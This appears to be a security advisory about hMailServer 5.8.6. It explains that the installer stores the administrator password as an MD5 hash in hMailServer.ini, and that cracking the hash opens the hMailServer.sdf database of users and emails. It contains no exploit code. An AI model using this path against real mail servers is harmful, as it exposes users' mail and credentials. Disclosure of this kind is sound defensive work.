hMailServer Information Disclosure Vulnerability via Insecure Password Hashing

A vulnerability in hMailServer version 5.8.6 allows local attackers to access sensitive information through the 'hMailServerInnoExtension.iss' and 'hMailServer.ini' files. During installation, the administrator password is hashed using MD5, a weak hashing algorithm, and stored in the INI file. This vulnerability can be exploited by cracking the MD5 hash to retrieve the password, which then unlocks the internal database containing user information and emails.

Impact

Exploitation of this vulnerability leads to unauthorized access to sensitive information, including decrypted passwords and database contents.

Reproduction

The vulnerability can be reproduced by installing hMailServer version 5.8.6. The installation process hashes the administrator password using MD5 and stores it in the 'hMailServer.ini' file. After the installation, the 'hMailServer.sdf' database file can be decrypted using the cracked password, granting access to sensitive information.